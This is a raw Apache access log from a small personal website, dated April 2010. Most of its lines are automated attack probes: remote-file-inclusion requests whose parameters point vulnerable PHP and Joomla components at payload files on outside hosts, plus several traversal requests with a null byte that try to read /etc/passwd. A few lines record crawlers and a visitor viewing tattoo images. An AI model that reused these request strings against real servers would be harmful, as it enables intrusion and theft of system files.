184.73.76.247 - - [09/Apr/2010:00:36:10 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.18) Gecko/2010021502 Ubuntu/8.04 (hardy) Firefox/3.0.18"
174.129.50.235 - - [09/Apr/2010:00:36:10 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.18) Gecko/2010021502 Ubuntu/8.04 (hardy) Firefox/3.0.18"
211.239.124.204 - - [09/Apr/2010:00:38:10 -0500] "GET /logs/access_log.1217203200%20%20/2/atom.php5?page=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
211.239.124.204 - - [09/Apr/2010:00:38:12 -0500] "GET /2/atom.php5?page=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 295 "-""Mozilla/5.0"
211.239.124.204 - - [09/Apr/2010:00:38:12 -0500] "GET /logs/2/atom.php5?page=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 300 "-""Mozilla/5.0"
211.239.124.204 - - [09/Apr/2010:00:38:21 -0500] "GET /logs/access_log.1220054400%20%20/2/atom.php5?page=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
211.239.124.204 - - [09/Apr/2010:00:38:37 -0500] "GET /logs/access_log.1217203200%20%20/2/atom.php5?page=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
211.239.124.204 - - [09/Apr/2010:00:38:37 -0500] "GET /2/atom.php5?page=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 295 "-""Mozilla/5.0"
211.239.124.204 - - [09/Apr/2010:00:38:40 -0500] "GET /logs/2/atom.php5?page=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 300 "-""Mozilla/5.0"
211.239.124.204 - - [09/Apr/2010:00:38:44 -0500] "GET /logs/access_log.1220054400%20%20/2/atom.php5?page=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
211.239.124.204 - - [09/Apr/2010:00:39:16 -0500] "GET /logs/access_log.1217203200/2/atom.php5?page=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
211.239.124.204 - - [09/Apr/2010:00:39:38 -0500] "GET /logs/access_log.1217203200/2/atom.php5?page=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
206.225.20.146 - - [09/Apr/2010:00:40:15 -0500] "GET //includes/media.divs.php?mosConfig_absolute_path=http://boxwww.co.kr/shop/session/security/id1.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
206.225.20.146 - - [09/Apr/2010:00:40:15 -0500] "GET /logs//includes/media.divs.php?mosConfig_absolute_path=http://boxwww.co.kr/shop/session/security/id1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
206.225.20.146 - - [09/Apr/2010:00:40:15 -0500] "GET /logs/access_log.1258329600//includes/media.divs.php?mosConfig_absolute_path=http://boxwww.co.kr/shop/session/security/id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
206.225.20.146 - - [09/Apr/2010:00:40:35 -0500] "GET /logs/access_log.1258329600//includes/media.divs.php?mosConfig_absolute_path=http://boxwww.co.kr/shop/session/security/id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
206.225.20.146 - - [09/Apr/2010:00:40:35 -0500] "GET //includes/media.divs.php?mosConfig_absolute_path=http://boxwww.co.kr/shop/session/security/id1.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
206.225.20.146 - - [09/Apr/2010:00:40:35 -0500] "GET /logs//includes/media.divs.php?mosConfig_absolute_path=http://boxwww.co.kr/shop/session/security/id1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
80.242.64.14 - - [09/Apr/2010:00:40:40 -0500] "GET //administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 338 "-""Mozilla/5.0"
80.242.64.14 - - [09/Apr/2010:00:40:40 -0500] "GET /logs/access_log.1268956800//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 365 "-""Mozilla/5.0"
80.242.64.14 - - [09/Apr/2010:00:40:40 -0500] "GET //administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 338 "-""Mozilla/5.0"
80.242.64.14 - - [09/Apr/2010:00:40:40 -0500] "GET /logs//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 343 "-""Mozilla/5.0"
80.242.64.14 - - [09/Apr/2010:00:40:40 -0500] "GET /logs/access_log.1268956800//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 365 "-""Mozilla/5.0"
80.242.64.14 - - [09/Apr/2010:00:40:40 -0500] "GET /logs//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 343 "-""Mozilla/5.0"
222.122.197.37 - - [09/Apr/2010:00:42:00 -0500] "GET /logs//components/com_flyspray/startdown.php?file=http://www.turismonellemarche.it/images/baru.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
222.122.197.37 - - [09/Apr/2010:00:42:00 -0500] "GET //components/com_flyspray/startdown.php?file=http://www.turismonellemarche.it/images/baru.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
65.55.106.136 - - [09/Apr/2010:00:42:35 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
62.149.228.44 - - [09/Apr/2010:00:43:12 -0500] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
62.149.228.44 - - [09/Apr/2010:00:43:12 -0500] "GET /logs/access_log.1220054400%20%20//bemarket/postscript/postscript.php?p_mode=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
62.149.228.44 - - [09/Apr/2010:00:43:12 -0500] "GET //bemarket/postscript/postscript.php?p_mode=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
203.251.80.167 - - [09/Apr/2010:00:44:30 -0500] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://dossierpolitico.com//galeria/panistasexpoforum45.jpg?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
203.251.80.167 - - [09/Apr/2010:00:44:30 -0500] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://dossierpolitico.com//galeria/panistasexpoforum45.jpg?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
203.251.80.167 - - [09/Apr/2010:00:44:30 -0500] "GET /logs/access_log.1268611200%20%20//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://dossierpolitico.com//galeria/panistasexpoforum45.jpg?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
203.251.80.167 - - [09/Apr/2010:00:44:33 -0500] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://dossierpolitico.com//galeria/panistasexpoforum45.jpg?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
203.251.80.167 - - [09/Apr/2010:00:44:33 -0500] "GET /logs/access_log.1268611200%20%20//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://dossierpolitico.com//galeria/panistasexpoforum45.jpg?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
203.251.80.167 - - [09/Apr/2010:00:44:33 -0500] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://dossierpolitico.com//galeria/panistasexpoforum45.jpg?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
202.71.108.26 - - [09/Apr/2010:00:45:42 -0500] "GET /logs///apache_transfer.cgi//s_loadenv.inc.php=http://www.dasherprinting.com/printer/id1.txt?? HTTP/1.1" 404 375 "-""Mozilla/5.0"
202.71.108.26 - - [09/Apr/2010:00:45:42 -0500] "GET ///apache_transfer.cgi//s_loadenv.inc.php=http://www.dasherprinting.com/printer/id1.txt?? HTTP/1.1" 404 370 "-""Mozilla/5.0"
202.71.108.26 - - [09/Apr/2010:00:45:42 -0500] "GET /logs/access_log.1216944000///apache_transfer.cgi//s_loadenv.inc.php=http://www.dasherprinting.com/printer/id1.txt?? HTTP/1.1" 404 397 "-""Mozilla/5.0"
211.239.124.204 - - [09/Apr/2010:00:48:16 -0500] "GET /logs/access_log.1211155200//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
211.239.124.204 - - [09/Apr/2010:00:48:17 -0500] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
211.239.124.204 - - [09/Apr/2010:00:48:19 -0500] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
67.195.112.180 - - [09/Apr/2010:00:48:36 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
203.251.80.167 - - [09/Apr/2010:00:50:38 -0500] "GET //administrator/components/com_virtuemart/export.php=http://dossierpolitico.com//galeria/panistasexpoforum45.jpg?? HTTP/1.1" 404 395 "-""Mozilla/5.0"
203.251.80.167 - - [09/Apr/2010:00:50:38 -0500] "GET /logs//administrator/components/com_virtuemart/export.php=http://dossierpolitico.com//galeria/panistasexpoforum45.jpg?? HTTP/1.1" 404 400 "-""Mozilla/5.0"
203.251.80.167 - - [09/Apr/2010:00:50:38 -0500] "GET /logs/access_log.1268956800%20%20//administrator/components/com_virtuemart/export.php=http://dossierpolitico.com//galeria/panistasexpoforum45.jpg?? HTTP/1.1" 404 424 "-""Mozilla/5.0"
203.251.80.167 - - [09/Apr/2010:00:50:47 -0500] "GET /logs/access_log.1268956800%20%20//administrator/components/com_virtuemart/export.php=http://dossierpolitico.com//galeria/panistasexpoforum45.jpg?? HTTP/1.1" 404 424 "-""Mozilla/5.0"
203.251.80.167 - - [09/Apr/2010:00:50:47 -0500] "GET //administrator/components/com_virtuemart/export.php=http://dossierpolitico.com//galeria/panistasexpoforum45.jpg?? HTTP/1.1" 404 395 "-""Mozilla/5.0"
203.251.80.167 - - [09/Apr/2010:00:50:47 -0500] "GET /logs//administrator/components/com_virtuemart/export.php=http://dossierpolitico.com//galeria/panistasexpoforum45.jpg?? HTTP/1.1" 404 400 "-""Mozilla/5.0"
203.251.80.167 - - [09/Apr/2010:00:50:50 -0500] "GET //administrator/components/com_virtuemart/export.php=http://dossierpolitico.com//galeria/panistasexpoforum45.jpg?? HTTP/1.1" 404 395 "-""Mozilla/5.0"
203.251.80.167 - - [09/Apr/2010:00:50:50 -0500] "GET /logs//administrator/components/com_virtuemart/export.php=http://dossierpolitico.com//galeria/panistasexpoforum45.jpg?? HTTP/1.1" 404 400 "-""Mozilla/5.0"
203.251.80.167 - - [09/Apr/2010:00:50:50 -0500] "GET /logs/access_log.1268956800%20%20//administrator/components/com_virtuemart/export.php=http://dossierpolitico.com//galeria/panistasexpoforum45.jpg?? HTTP/1.1" 404 424 "-""Mozilla/5.0"
203.251.80.167 - - [09/Apr/2010:00:51:01 -0500] "GET /logs//administrator/components/com_virtuemart/export.php=http://dossierpolitico.com//galeria/panistasexpoforum45.jpg?? HTTP/1.1" 404 400 "-""Mozilla/5.0"
203.251.80.167 - - [09/Apr/2010:00:51:01 -0500] "GET //administrator/components/com_virtuemart/export.php=http://dossierpolitico.com//galeria/panistasexpoforum45.jpg?? HTTP/1.1" 404 395 "-""Mozilla/5.0"
203.251.80.167 - - [09/Apr/2010:00:51:01 -0500] "GET /logs/access_log.1268956800%20%20//administrator/components/com_virtuemart/export.php=http://dossierpolitico.com//galeria/panistasexpoforum45.jpg?? HTTP/1.1" 404 424 "-""Mozilla/5.0"
80.242.64.14 - - [09/Apr/2010:00:52:31 -0500] "GET ///?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 200 1004 "-""Mozilla/5.0"
80.242.64.14 - - [09/Apr/2010:00:52:31 -0500] "GET /logs///?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 200 1065 "-""Mozilla/5.0"
80.242.64.14 - - [09/Apr/2010:00:52:33 -0500] "GET /logs///?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 200 1065 "-""Mozilla/5.0"
80.242.64.14 - - [09/Apr/2010:00:52:33 -0500] "GET ///?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 200 1004 "-""Mozilla/5.0"
80.242.64.14 - - [09/Apr/2010:00:52:33 -0500] "GET /logs/access_log.1264636800///?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 313 "-""Mozilla/5.0"
80.242.64.14 - - [09/Apr/2010:00:52:42 -0500] "GET /logs/access_log.1264636800///?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 313 "-""Mozilla/5.0"
80.242.64.14 - - [09/Apr/2010:00:52:42 -0500] "GET /logs///?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 200 1065 "-""Mozilla/5.0"
80.242.64.14 - - [09/Apr/2010:00:52:42 -0500] "GET ///?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 200 1004 "-""Mozilla/5.0"
80.242.64.14 - - [09/Apr/2010:00:52:52 -0500] "GET /logs/access_log.1264636800///?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 313 "-""Mozilla/5.0"
203.251.80.167 - - [09/Apr/2010:00:53:43 -0500] "GET /logs/access_log.1268265600%20%20//administrator/components/com_virtuemart/export.php=http://dossierpolitico.com//galeria/panistasexpoforum45.jpg?? HTTP/1.1" 404 424 "-""Mozilla/5.0"
203.251.80.167 - - [09/Apr/2010:00:53:43 -0500] "GET /logs/access_log.1268265600%20%20//administrator/components/com_virtuemart/export.php=http://dossierpolitico.com//galeria/panistasexpoforum45.jpg?? HTTP/1.1" 404 424 "-""Mozilla/5.0"
203.251.80.167 - - [09/Apr/2010:00:54:00 -0500] "GET /logs/access_log.1268265600%20%20//administrator/components/com_virtuemart/export.php=http://dossierpolitico.com//galeria/panistasexpoforum45.jpg?? HTTP/1.1" 404 424 "-""Mozilla/5.0"
207.46.199.47 - - [09/Apr/2010:00:54:30 -0500] "GET /logs/access_log.1264377600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
222.122.197.37 - - [09/Apr/2010:00:54:37 -0500] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.turismonellemarche.it/images/baru.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
222.122.197.37 - - [09/Apr/2010:00:54:50 -0500] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.turismonellemarche.it/images/baru.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
203.251.80.167 - - [09/Apr/2010:00:55:14 -0500] "GET /logs/access_log.1268265600%20%20//administrator/components/com_virtuemart/export.php=http://dossierpolitico.com//galeria/panistasexpoforum45.jpg?? HTTP/1.1" 404 424 "-""Mozilla/5.0"
62.149.228.44 - - [09/Apr/2010:00:56:35 -0500] "GET /logs/access_log.1220054400//bemarket/postscript/postscript.php?p_mode=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
174.133.122.210 - - [09/Apr/2010:01:01:13 -0500] "GET //index.php/?custompluginfile[]=http://www.americinn.com//email-images/images/AinuLid1.txt?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
174.133.122.210 - - [09/Apr/2010:01:01:13 -0500] "GET /logs//index.php/?custompluginfile[]=http://www.americinn.com//email-images/images/AinuLid1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
174.133.122.210 - - [09/Apr/2010:01:01:13 -0500] "GET /logs/access_log.1219708800//index.php/?custompluginfile[]=http://www.americinn.com//email-images/images/AinuLid1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
174.133.122.210 - - [09/Apr/2010:01:01:34 -0500] "GET /logs/access_log.1219708800//index.php/?custompluginfile[]=http://www.americinn.com//email-images/images/AinuLid1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
174.133.122.210 - - [09/Apr/2010:01:01:34 -0500] "GET /logs//index.php/?custompluginfile[]=http://www.americinn.com//email-images/images/AinuLid1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
174.133.122.210 - - [09/Apr/2010:01:01:34 -0500] "GET //index.php/?custompluginfile[]=http://www.americinn.com//email-images/images/AinuLid1.txt?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
202.71.108.26 - - [09/Apr/2010:01:02:55 -0500] "GET /logs/access_log.1268265600//microcms/micro_cms_files/microcms-include.php?microcms_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 357 "-""libwww-perl/5.79"
202.71.108.26 - - [09/Apr/2010:01:02:55 -0500] "GET //microcms/micro_cms_files/microcms-include.php?microcms_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 330 "-""libwww-perl/5.79"
202.71.108.26 - - [09/Apr/2010:01:02:56 -0500] "GET /logs//microcms/micro_cms_files/microcms-include.php?microcms_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 335 "-""libwww-perl/5.79"
202.71.108.26 - - [09/Apr/2010:01:03:24 -0500] "GET /logs/access_log.1268265600//microcms/micro_cms_files/microcms-include.php?microcms_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 357 "-""libwww-perl/5.79"
202.71.108.26 - - [09/Apr/2010:01:03:24 -0500] "GET //microcms/micro_cms_files/microcms-include.php?microcms_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 330 "-""libwww-perl/5.79"
202.71.108.26 - - [09/Apr/2010:01:03:24 -0500] "GET /logs//microcms/micro_cms_files/microcms-include.php?microcms_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 335 "-""libwww-perl/5.79"
202.71.108.26 - - [09/Apr/2010:01:03:55 -0500] "GET ///apache_transfer.cgi//s_loadenv.inc.php=http://www.dasherprinting.com/printer/id1.txt?? HTTP/1.1" 404 370 "-""Mozilla/5.0"
202.71.108.26 - - [09/Apr/2010:01:03:55 -0500] "GET /logs/access_log.1216944000///apache_transfer.cgi//s_loadenv.inc.php=http://www.dasherprinting.com/printer/id1.txt?? HTTP/1.1" 404 397 "-""Mozilla/5.0"
202.71.108.26 - - [09/Apr/2010:01:03:56 -0500] "GET /logs///apache_transfer.cgi//s_loadenv.inc.php=http://www.dasherprinting.com/printer/id1.txt?? HTTP/1.1" 404 375 "-""Mozilla/5.0"
174.133.122.210 - - [09/Apr/2010:01:05:48 -0500] "GET /logs//index.php/?custompluginfile[]=http://www.americinn.com//email-images/images/AinuLid1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
174.133.122.210 - - [09/Apr/2010:01:05:48 -0500] "GET //index.php/?custompluginfile[]=http://www.americinn.com//email-images/images/AinuLid1.txt?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
174.133.122.210 - - [09/Apr/2010:01:05:48 -0500] "GET /logs/access_log.1219708800%20%20//index.php/?custompluginfile[]=http://www.americinn.com//email-images/images/AinuLid1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
218.97.241.67 - - [09/Apr/2010:01:05:53 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://danangportvn.com:32000//1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
218.97.241.67 - - [09/Apr/2010:01:05:53 -0500] "GET /logs/access_log.1219708800//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://danangportvn.com:32000//1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
218.97.241.67 - - [09/Apr/2010:01:05:53 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://danangportvn.com:32000//1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
174.133.122.210 - - [09/Apr/2010:01:05:54 -0500] "GET //index.php/?custompluginfile[]=http://www.americinn.com//email-images/images/AinuLid1.txt?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
174.133.122.210 - - [09/Apr/2010:01:05:54 -0500] "GET /logs//index.php/?custompluginfile[]=http://www.americinn.com//email-images/images/AinuLid1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
174.133.122.210 - - [09/Apr/2010:01:05:54 -0500] "GET /logs/access_log.1219708800%20%20//index.php/?custompluginfile[]=http://www.americinn.com//email-images/images/AinuLid1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
218.97.241.67 - - [09/Apr/2010:01:06:16 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://danangportvn.com:32000//1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
218.97.241.67 - - [09/Apr/2010:01:06:16 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://danangportvn.com:32000//1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
218.97.241.67 - - [09/Apr/2010:01:06:16 -0500] "GET /logs/access_log.1219708800//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://danangportvn.com:32000//1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
222.122.197.37 - - [09/Apr/2010:01:06:18 -0500] "GET /logs//components/com_flyspray/startdown.php?file=http://www.turismonellemarche.it/images/baru.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
222.122.197.37 - - [09/Apr/2010:01:06:18 -0500] "GET //components/com_flyspray/startdown.php?file=http://www.turismonellemarche.it/images/baru.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
222.122.197.37 - - [09/Apr/2010:01:06:39 -0500] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.turismonellemarche.it/images/baru.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
222.122.197.37 - - [09/Apr/2010:01:06:39 -0500] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.turismonellemarche.it/images/baru.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
64.180.76.102 - - [09/Apr/2010:01:07:50 -0500] "GET /tattoo/tattoo-order.htm HTTP/1.1" 200 3254 "http://images.google.ca/imgres?imgurl=http://tomdolan.pconline.com/tattoo/tat6.JPG&imgrefurl=http://tomdolan.pconline.com/tattoo/tattoo-order.htm&usg=__dTWna7zfOF9Glbm5Kjzek0uBNb8=&h=246&w=236&sz=19&hl=en&start=272&itbs=1&tbnid=Js0hVP5NTJi0TM:&tbnh=110&tbnw=106&prev=/images%3Fq%3Dvintage%2Btattoo%2Bflash%26start%3D270%26hl%3Den%26sa%3DN%26gbv%3D2%26ndsp%3D18%26tbs%3Disch:1""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
64.180.76.102 - - [09/Apr/2010:01:07:50 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
64.180.76.102 - - [09/Apr/2010:01:07:51 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
64.180.76.102 - - [09/Apr/2010:01:07:51 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
64.180.76.102 - - [09/Apr/2010:01:07:51 -0500] "GET /tattoo/tat10.jpg HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
64.180.76.102 - - [09/Apr/2010:01:07:51 -0500] "GET /tattoo/tat-cd1.jpg HTTP/1.1" 200 67733 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
64.180.76.102 - - [09/Apr/2010:01:08:03 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
64.180.76.102 - - [09/Apr/2010:01:08:11 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2362 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
64.180.76.102 - - [09/Apr/2010:01:08:11 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
64.180.76.102 - - [09/Apr/2010:01:08:11 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
64.180.76.102 - - [09/Apr/2010:01:08:11 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
64.180.76.102 - - [09/Apr/2010:01:08:11 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
64.180.76.102 - - [09/Apr/2010:01:08:11 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
64.180.76.102 - - [09/Apr/2010:01:08:11 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
